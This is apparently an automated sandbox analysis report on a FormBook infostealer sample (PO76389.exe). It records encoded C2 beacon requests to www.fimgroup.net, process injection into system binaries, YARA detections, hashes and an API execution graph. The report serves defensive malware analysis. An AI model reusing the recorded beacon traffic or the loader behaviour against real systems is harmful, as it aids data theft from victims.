                                                  Data Ascii: prutfR_P=OjQmhLDtwrBa+4iLZvecvFdEQqa6AeQpwejtdp+7fIxf8A/Ztj/DiLpAwFIV/sHn/W1RCIVAPbW5US/BZpmR3aR0aQbpBG4p+3cJLr5mLWDs483Brm/T7eVmtF08Pqbw91MU6gPT9uQ92BcJsHKgF8sn3r4O9TDUSDz2rVCpxI5dJxxwt902lAjOEZGeteyRcTbHi6xcX7UtopPjGMCIdOHRuyhJ1gNjFalcI/HCBf1D11sP7smD1QFq3yLS98jDI6Njtailrbv9ixLUq/pHQThNxXXEqHz0ulrhzD53pVb9+T8zxzkOUDZt6rEgTHh+WJhWyhLFVtK+Tna0cDUtSJHY2xwwzWumhdpsf1xEP3EgGjF7w1Yfd4OD523Hwqy0mF/0LBwUaS3U/hE9OeV7xJQ34ioY8YsrIWp1kqdLYFoMXsLuf2nmbi3jZgNf7j+Kpph148jRtQgs+Q1p7nUo3aPhlVOx9XJUbAY4X5p637LS+3A1UMRVhme1491DRkWxLdjewzhj7EZWCLtfZenSYgCBAKmp5tR0A91riFgAWFZnH+yE/7ZchKnKl9Nia5FjJwytaTeZVmazWB87nH7Wrf4x54N4YN1Ayhrjn2YJpscbABYhjxGBHWflhPzosAD7IeCA6cZznGV1WB68wYc8kdWBOwYczcUmdFY3yaOFsaV7jnKLG8gdoKZ+qRsvGp7RspbGFfRaE0K3uu65UIEFrgXIs6tOj3VoL3jLIlQZtbw7ukFQmJGf0kx2E+NYaTW/w6TAsepPwExCPWa1naH2K/fxaCF7F8KKPYI4IsluQ1e4LUSaZ2lSUGoeaceEGJETPNLEcMEkwcbgDd4svadkRo28EdAw73PrmlUr1QokovdvyeTRAwtqRcFoT2WJLsE3PDMg9u3qSTZ3wx3QHAId/rH5r+CbayCNAF8f/390vHDcH1Y20KDDMY2LjrDTweDx8eM/5O0zwYzv7CVJPQ10wXtf8A9QQde3sMqQ1EC9CQQ [TRUNCATED]
                                                  Sep 16, 2024 09:41:07.235972881 CEST1236INHTTP/1.1 404 Not Found
                                                  Cache-Control: private
                                                  Content-Type: text/html; charset=utf-8
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Mon, 16 Sep 2024 07:41:06 GMT
                                                  Connection: close
                                                  Content-Length: 4948
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                  Sep 16, 2024 09:41:07.235990047 CEST1236INData Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                                  Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                                  Sep 16, 2024 09:41:07.236000061 CEST1236INData Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
                                                  Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                                  Sep 16, 2024 09:41:07.236010075 CEST1236INData Raw: 6d 61 74 69 6f 6e 3a 3c 2f 68 34 3e 20 0a 20 20 3c 64 69 76 20 69 64 3d 22 64 65 74 61 69 6c 73 2d 6c 65 66 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c
                                                  Data Ascii: mation:</h4> <div id="details-left"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Module</th><td>&nbsp;&nbsp;&nbsp;IIS Web Core</td></tr> <tr><th>Notification</th><td>&nbsp;&nbsp;&nbsp;MapRequestHandl
                                                  Sep 16, 2024 09:41:07.236021042 CEST223INData Raw: 74 6f 72 79 20 61 6e 64 20 74 72 79 20 74 68 65 20 72 65 71 75 65 73 74 20 61 67 61 69 6e 2e 20 0a 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6f 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 66 77 6c 69 6e 6b 2f 3f 4c 69
                                                  Data Ascii: tory and try the request again. <p><a href="https://go.microsoft.com/fwlink/?LinkID=62293&amp;IIS70Error=404,0,0x80070002,17763">View more information &raquo;</a></p> </fieldset> </div> </div> </body> </html>


                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  36192.168.2.54974862.149.128.40802796C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  TimestampBytes transferredDirectionData
                                                  Sep 16, 2024 09:41:09.210674047 CEST524OUTGET /f3w9/?prutfR_P=Dh4Gi9+74bFgt7GfY7nAkA9WO4K4BtRildy9F7aGfftu7RHBnk3NlrVThFQn4aec5hsiNdt2NoWcO3TRD6+a1p9HDTSMRDAgwWxIW4AdBTiWqaWdzxLVl6hXjmw9P5qUhA==&u8b=M0MH_xux6 HTTP/1.1
                                                  Host: www.fimgroup.net
                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                  Accept-Language: en-US
                                                  Connection: close
                                                  User-Agent: Mozilla/5.0 (Linux; Android 5.0.1; SAMSUNG SCH-R970 USCC Build/LRX22C) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
                                                  Sep 16, 2024 09:41:09.875648975 CEST1236INHTTP/1.1 404 Not Found
                                                  Cache-Control: private
                                                  Content-Type: text/html; charset=utf-8
                                                  Server: Microsoft-IIS/10.0
                                                  X-Powered-By: ASP.NET
                                                  Date: Mon, 16 Sep 2024 07:41:09 GMT
                                                  Connection: close
                                                  Content-Length: 5108
                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 20 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 20 0a 3c 68 65 61 64 3e 20 0a 3c 74 69 74 6c 65 3e 49 49 53 20 31 30 2e 30 20 44 65 74 61 69 6c 65 64 20 45 72 72 6f 72 20 2d 20 34 30 34 2e 30 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 20 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 20 0a 3c 21 2d 2d 20 0a 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 37 65 6d 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 56 65 72 64 61 6e 61 2c 41 72 69 61 6c 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 [TRUNCATED]
                                                  Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>IIS 10.0 Detailed Error - 404.0 - Not Found</title> <style type="text/css"> ... body{margin:0;font-size:.7em;font-family:Verdana,Arial,Helvetica,sans-serif;} code{margin:0;color:#006600;font-size:1.1em;font-weight:bold;} .config_source code{font-size:.8em;color:#000000;} pre{margin:0;font-size:1.4em;word-wrap:break-word;} ul,ol{margin:10px 0 10px 5px;} ul.first,ol.first{margin-top:5px;} fieldset{padding:0 15px 10px 15px;word-break:break-all;} .summary-container fieldset{padding-bottom:5px;margin-top:4px;} legend.no-expand-all{padding:2px 15px 4px 10px;margin:0 0 0 -12px;} legend{color:#333333;;margin:4px 0 8px -12px;_margin-top:0px; font-weight:bold;font-size:1em;} a:link,a:visited{color:#007EFF;font-weight:bold;} a:hover{text-decoration:none;} h1{font-size:2.4em;margin:0;color:#FFF;} h2{font-size:1.7em;margin:0 [TRUNCATED]
                                                  Sep 16, 2024 09:41:09.875668049 CEST1236INData Raw: 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 33 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 30 20 30 3b 63 6f 6c 6f 72 3a 23 43 43 30 30 30 30 3b 7d 20 0a 68 34 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e
                                                  Data Ascii: r:#CC0000;} h3{font-size:1.4em;margin:10px 0 0 0;color:#CC0000;} h4{font-size:1.2em;margin:10px 0 5px 0; }#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS",Verdana,sans-serif; color:#FFF;background-color:#5
                                                  Sep 16, 2024 09:41:09.875679970 CEST448INData Raw: 3a 69 74 61 6c 69 63 3b 7d 20 0a 2e 63 6c 65 61 72 7b 63 6c 65 61 72 3a 62 6f 74 68 3b 7d 20 0a 2e 70 72 65 66 65 72 72 65 64 7b 70 61 64 64 69 6e 67 3a 30 20 35 70 78 20 32 70 78 20 35 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61
                                                  Data Ascii: :italic;} .clear{clear:both;} .preferred{padding:0 5px 2px 5px;font-weight:normal;background:#006633;color:#FFF;font-size:.8em;} --> </style> </head> <body> <div id="content"> <div class="content-container"> <h3>HTTP Error 404.0 -
                                                  Sep 16, 2024 09:41:09.875689030 CEST1236INData Raw: 65 73 3a 3c 2f 68 34 3e 20 0a 20 20 3c 75 6c 3e 20 09 3c 6c 69 3e 54 68 65 20 64 69 72 65 63 74 6f 72 79 20 6f 72 20 66 69 6c 65 20 73 70 65 63 69 66 69 65 64 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 20 6f 6e 20 74 68 65 20 57 65 62 20 73 65
                                                  Data Ascii: es:</h4> <ul> <li>The directory or file specified does not exist on the Web server.</li> <li>The URL contains a typographical error.</li> <li>A custom filter or module, such as URLScan, restricts access to the file.</li> </ul> </fields
                                                  Sep 16, 2024 09:41:09.875705957 CEST1171INData Raw: 64 65 74 61 69 6c 73 2d 72 69 67 68 74 22 3e 20 0a 20 20 20 3c 74 61 62 6c 65 20 62 6f 72 64 65 72 3d 22 30 22 20 63 65 6c 6c 70 61 64 64 69 6e 67 3d 22 30 22 20 63 65 6c 6c 73 70 61 63 69 6e 67 3d 22 30 22 3e 20 0a 20 20 20 20 3c 74 72 20 63 6c
                                                  Data Ascii: details-right"> <table border="0" cellpadding="0" cellspacing="0"> <tr class="alt"><th>Requested URL</th><td>&nbsp;&nbsp;&nbsp;http://www.fimgroup.net:80/f3w9/?prutfR_P=Dh4Gi9+74bFgt7GfY7nAkA9WO4K4BtRildy9F7aGfftu7RHBnk3NlrVThFQn4aec5


                                                  Click to jump to process

                                                  Click to jump to process

                                                  Click to dive into process behavior distribution

                                                  Click to jump to process

                                                  Target ID:0
                                                  Start time:03:37:02
                                                  Start date:16/09/2024
                                                  Path:C:\Users\user\Desktop\PO76389.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\PO76389.exe"
                                                  Imagebase:0x4b0000
                                                  File size:756'224 bytes
                                                  MD5 hash:F28830224D4ED5B9B9B16FB45D5FD569
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Reputation:low
                                                  Has exited:true

                                                  Target ID:2
                                                  Start time:03:37:03
                                                  Start date:16/09/2024
                                                  Path:C:\Windows\SysWOW64\svchost.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Users\user\Desktop\PO76389.exe"
                                                  Imagebase:0x1a0000
                                                  File size:46'504 bytes
                                                  MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                                                  Has elevated privileges:true
                                                  Has administrator privileges:true
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2532350499.0000000002520000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2532645690.0000000002FA0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.2533022520.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000002.00000002.2533022520.0000000003800000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:true

                                                  Target ID:4
                                                  Start time:03:37:39
                                                  Start date:16/09/2024
                                                  Path:C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe"
                                                  Imagebase:0x920000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.4569325211.0000000002580000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000004.00000002.4569325211.0000000002580000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:5
                                                  Start time:03:37:40
                                                  Start date:16/09/2024
                                                  Path:C:\Windows\SysWOW64\netbtugc.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Windows\SysWOW64\netbtugc.exe"
                                                  Imagebase:0x770000
                                                  File size:22'016 bytes
                                                  MD5 hash:EE7BBA75B36D54F9E420EB6EE960D146
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4568125135.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4568125135.0000000000600000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4568413195.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4568413195.00000000028A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.4568496807.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.4568496807.00000000028F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                  Reputation:moderate
                                                  Has exited:false

                                                  Target ID:7
                                                  Start time:03:37:54
                                                  Start date:16/09/2024
                                                  Path:C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe
                                                  Wow64 process (32bit):true
                                                  Commandline:"C:\Program Files (x86)\TMuatYTfIRBsfkcpSMpmMhCLIVpEpCxCyQoamhHwRSIEykejNGFHNq\TrBUxuahdhJ.exe"
                                                  Imagebase:0x920000
                                                  File size:140'800 bytes
                                                  MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Yara matches:
                                                  • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                  • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.4571538439.0000000005500000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                  Reputation:high
                                                  Has exited:false

                                                  Target ID:8
                                                  Start time:03:38:11
                                                  Start date:16/09/2024
                                                  Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                  Wow64 process (32bit):false
                                                  Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                  Imagebase:0x7ff79f9e0000
                                                  File size:676'768 bytes
                                                  MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                  Has elevated privileges:false
                                                  Has administrator privileges:false
                                                  Programmed in:C, C++ or other language
                                                  Reputation:high
                                                  Has exited:true

                                                  Reset < >

                                                    Execution Graph

                                                    Execution Coverage:3%
                                                    Dynamic/Decrypted Code Coverage:2.4%
                                                    Signature Coverage:11.2%
                                                    Total number of Nodes:1646
                                                    Total number of Limit Nodes:144
                                                    execution_graph 103668 da1748 103682 d9f398 103668->103682 103670 da1859 103685 da1638 103670->103685 103672 da1882 CreateFileW 103674 da18d9 103672->103674 103675 da18d4 103672->103675 103674->103675 103676 da18f0 VirtualAlloc 103674->103676 103676->103675 103677 da190e ReadFile 103676->103677 103677->103675 103678 da192c 103677->103678 103679 da0638 13 API calls 103678->103679 103680 da195f 103679->103680 103681 da1982 ExitProcess 103680->103681 103681->103675 103688 da2888 GetPEB 103682->103688 103684 d9fa23 103684->103670 103686 da1641 Sleep 103685->103686 103687 da164f 103686->103687 103689 da28b2 103688->103689 103689->103684 103690 52a0a7 103694 4faf66 103690->103694 103692 52a0b2 103693 4faf66 84 API calls 103692->103693 103693->103692 103695 4fafa0 103694->103695 103700 4faf73 103694->103700 103695->103692 103696 4fafa2 103735 4cf833 81 API calls 103696->103735 103698 4fafa7 103705 4b84a6 103698->103705 103700->103695 103700->103696 103700->103698 103703 4faf9a 103700->103703 103701 4fafae 103725 4b7b4b 103701->103725 103734 4c4265 61 API calls _memmove 103703->103734 103706 4b84be 103705->103706 103723 4b84ba 103705->103723 103707 525592 __i64tow 103706->103707 103708 525494 103706->103708 103709 4b84d2 103706->103709 103715 4b84ea __itow Mailbox _wcscpy 103706->103715 103711 52557a 103708->103711 103712 52549d 103708->103712 103736 4d234b 80 API calls 3 library calls 103709->103736 103750 4d234b 80 API calls 3 library calls 103711->103750 103712->103715 103716 5254bc 103712->103716 103737 4d010a 103715->103737 103718 4d010a 48 API calls 103716->103718 103717 4b84f4 103717->103723 103746 4bcaee 103717->103746 103720 5254d9 103718->103720 103721 4d010a 48 API calls 103720->103721 103722 5254ff 103721->103722 103722->103723 103724 4bcaee 48 API calls 103722->103724 103723->103701 103724->103723 103726 4b7b5d 103725->103726 103727 52240d 103725->103727 103773 4bbbd9 103726->103773 103779 4ec0a2 48 API calls _memmove 103727->103779 103730 522417 103780 4bc935 103730->103780 103731 4b7b69 103731->103695 103733 52241f Mailbox 103734->103695 103735->103698 103736->103715 103740 4d0112 __calloc_impl 103737->103740 103739 4d012c 103739->103717 103740->103739 103741 4d012e std::exception::exception 103740->103741 103751 4d45ec 103740->103751 103765 4d7495 RaiseException 103741->103765 103743 4d0158 103766 4d73cb 47 API calls _free 103743->103766 103745 4d016a 103745->103717 103747 4bcafd __wsetenvp _memmove 103746->103747 103748 4d010a 48 API calls 103747->103748 103749 4bcb3b 103748->103749 103749->103723 103750->103715 103752 4d4667 __calloc_impl 103751->103752 103757 4d45f8 __calloc_impl 103751->103757 103772 4d889e 47 API calls __getptd_noexit 103752->103772 103755 4d462b RtlAllocateHeap 103755->103757 103764 4d465f 103755->103764 103757->103755 103758 4d4603 103757->103758 103759 4d4653 103757->103759 103762 4d4651 103757->103762 103758->103757 103767 4d8e52 47 API calls 2 library calls 103758->103767 103768 4d8eb2 47 API calls 8 library calls 103758->103768 103769 4d1d65 GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 103758->103769 103770 4d889e 47 API calls __getptd_noexit 103759->103770 103771 4d889e 47 API calls __getptd_noexit 103762->103771 103764->103740 103765->103743 103766->103745 103767->103758 103768->103758 103770->103762 103771->103764 103772->103764 103774 4bbbe7 103773->103774 103778 4bbc0d _memmove 103773->103778 103775 4d010a 48 API calls 103774->103775 103774->103778 103776 4bbc5c 103775->103776 103777 4d010a 48 API calls 103776->103777 103777->103778 103778->103731 103779->103730 103781 4bc948 103780->103781 103782 4bc940 103780->103782 103781->103733 103784 4bd805 103782->103784 103785 4bd828 _memmove 103784->103785 103786 4bd815 103784->103786 103785->103781 103786->103785 103787 4d010a 48 API calls 103786->103787 103787->103785 103788 521eca 103793 4cbe17 103788->103793 103792 521ed9 103802 4bd3d2 103793->103802 103797 52db92 103799 4cbf22 103799->103797 103800 4cbf3e 103799->103800 103810 4cc8b7 48 API calls _memmove 103799->103810 103801 4d1b2a 52 API calls __cinit 103800->103801 103801->103792 103803 4d010a 48 API calls 103802->103803 103804 4bd3f3 103803->103804 103805 4d010a 48 API calls 103804->103805 103806 4bd401 103805->103806 103807 4cc929 103806->103807 103811 4cc955 103807->103811 103810->103799 103812 4cc948 103811->103812 103813 4cc962 103811->103813 103812->103799 103813->103812 103814 4cc969 RegOpenKeyExW 103813->103814 103814->103812 103815 4cc983 RegQueryValueExW 103814->103815 103816 4cc9b9 RegCloseKey 103815->103816 103817 4cc9a4 103815->103817 103816->103812 103817->103816 103818 da1cf3 103819 da1d08 103818->103819 103820 d9f398 GetPEB 103819->103820 103821 da1d14 103820->103821 103822 da1dc8 103821->103822 103823 da1d32 103821->103823 103840 da2678 9 API calls 103822->103840 103827 da19d8 103823->103827 103826 da1daf 103828 d9f398 GetPEB 103827->103828 103837 da1a77 103828->103837 103830 da1aa8 CreateFileW 103834 da1ab5 103830->103834 103830->103837 103831 da1ad1 VirtualAlloc 103832 da1af2 ReadFile 103831->103832 103831->103834 103833 da1b10 VirtualAlloc 103832->103833 103832->103834 103833->103834 103833->103837 103835 da1cd2 103834->103835 103836 da1cc4 VirtualFree 103834->103836 103835->103826 103836->103835 103837->103831 103837->103834 103838 da1bd8 CloseHandle 103837->103838 103839 da1be8 VirtualFree 103837->103839 103841 da28e8 GetPEB 103837->103841 103838->103837 103839->103837 103840->103826 103842 da2912 103841->103842 103842->103830 103843 521edb 103848 4b131c 103843->103848 103845 521ee1 103881 4d1b2a 52 API calls __cinit 103845->103881 103847 521eeb 103849 4b133e 103848->103849 103882 4b1624 103849->103882 103854 4bd3d2 48 API calls 103855 4b137e 103854->103855 103856 4bd3d2 48 API calls 103855->103856 103857 4b1388 103856->103857 103858 4bd3d2 48 API calls 103857->103858 103859 4b1392 103858->103859 103860 4bd3d2 48 API calls 103859->103860 103861 4b13d8 103860->103861 103862 4bd3d2 48 API calls 103861->103862 103863 4b14bb 103862->103863 103890 4b1673 103863->103890 103867 4b14eb 103868 4bd3d2 48 API calls 103867->103868 103869 4b14f5 103868->103869 103919 4b175e 103869->103919 103871 4b1540 103872 4b1550 GetStdHandle 103871->103872 103873 4b15ab 103872->103873 103874 5258da 103872->103874 103875 4b15b1 CoInitialize 103873->103875 103874->103873 103876 5258e3 103874->103876 103875->103845 103926 4f9bd1 53 API calls 103876->103926 103878 5258ea 103927 4fa2f6 CreateThread 103878->103927 103880 5258f6 CloseHandle 103880->103875 103881->103847 103928 4b17e0 103882->103928 103886 4b1344 103887 4b16db 103886->103887 103963 4b1867 6 API calls 103887->103963 103889 4b1374 103889->103854 103891 4bd3d2 48 API calls 103890->103891 103892 4b1683 103891->103892 103893 4bd3d2 48 API calls 103892->103893 103894 4b168b 103893->103894 103964 4b7d70 103894->103964 103897 4b7d70 48 API calls 103898 4b169b 103897->103898 103899 4bd3d2 48 API calls 103898->103899 103900 4b16a6 103899->103900 103901 4d010a 48 API calls 103900->103901 103902 4b14c5 103901->103902 103903 4b16f2 103902->103903 103904 4b1700 103903->103904 103905 4bd3d2 48 API calls 103904->103905 103906 4b170b 103905->103906 103907 4bd3d2 48 API calls 103906->103907 103908 4b1716 103907->103908 103909 4bd3d2 48 API calls 103908->103909 103910 4b1721 103909->103910 103911 4bd3d2 48 API calls 103910->103911 103912 4b172c 103911->103912 103913 4b7d70 48 API calls 103912->103913 103914 4b1737 103913->103914 103915 4d010a 48 API calls 103914->103915 103916 4b173e 103915->103916 103917 5224a6 103916->103917 103918 4b1747 RegisterClipboardFormatW 103916->103918 103918->103867 103920 4b176e 103919->103920 103921 5267dd 103919->103921 103922 4d010a 48 API calls 103920->103922 103969 4fd231 50 API calls 103921->103969 103925 4b1776 103922->103925 103924 5267e8 103925->103871 103926->103878 103927->103880 103970 4fa2dc 54 API calls 103927->103970 103944 4b17fc 103928->103944 103931 4b17fc 48 API calls 103932 4b17f0 103931->103932 103933 4bd3d2 48 API calls 103932->103933 103934 4b165b 103933->103934 103935 4b7e53 103934->103935 103936 4b7ecf 103935->103936 103937 4b7e5f __wsetenvp 103935->103937 103955 4ba2fb 103936->103955 103940 4b7e7b 103937->103940 103941 4b7ec7 103937->103941 103939 4b7e85 _memmove 